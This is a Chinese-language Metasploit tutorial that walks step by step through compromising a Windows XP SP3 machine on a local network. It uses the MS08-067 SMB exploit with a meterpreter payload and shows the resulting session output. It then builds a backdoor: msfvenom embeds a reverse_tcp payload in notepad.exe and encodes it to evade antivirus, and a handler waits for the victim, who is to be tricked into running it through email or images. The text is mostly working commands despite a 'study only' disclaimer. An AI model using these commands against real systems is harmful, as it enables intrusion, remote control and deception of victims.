我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。 本文演示怎么使用Metasploit入侵windows xp sp3。 启动msfconsole: # msfconsole 选择一个漏洞: msf > search platform: windows xp sp3 exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。 查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助: msf > info exploit/windows/smb/ms08_067_netapi 依次执行如下命令: msf > use exploit/windows/smb/ms08_067_netapi > set payload windows/meterpreter/bind_tcp > set RHOST 192.168.0.108 (设置目标主机IP地址) > exploit 如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。 Started bind handler Automatically detecting the target... Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese Selected Target: Windows XP SP3 Chinese ( AlwaysOn NK) Attempting to trigger the vulnerability... Sending stage (751104 bytes) to 192.168.0.108 Meterpreter session 1 opened (192.168.0.1 :41614 -> 192.168.0.108 :4444) at 2016 -04-15 17 :29:32meterpreter > 现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。 演示使用后门程序侵入Windows原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。 生成后门程序: 我把后门程序隐藏到记事本程序中:notepad.exe 查看Kali Linux的IP:ifconfig(192.168.0.112) 创建后门程序,my_backdoor.exe: # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe > my_backdoor.exe 上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man msfvenom查看帮助。 把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。 启动msfconsole: # msfconsole use exploit/multi/ handlerset LHOST 192.168.0.112 set LPORT 4445 set payload windows/meterpreter/reverse_tcp show optionsexploit 等待受害者启动后门程序。 OK,入侵成功。
安全无边疆,努力习知识
本文章只供学习交流学习不可用于其他非法用途!!! 版权声明:凡注明“来源:kali中文网”的所有作品,均为kali中文网以作者的作品,未经作者及网站授权不得转载、摘编或利用其它方式使用上述作品。已经本网授权使用作品的,应在授权范围内使用,并注明“来源:kali中文网(www.kaliorg.com)”。违反上述声明者,本站将追究其相关法律责任。
|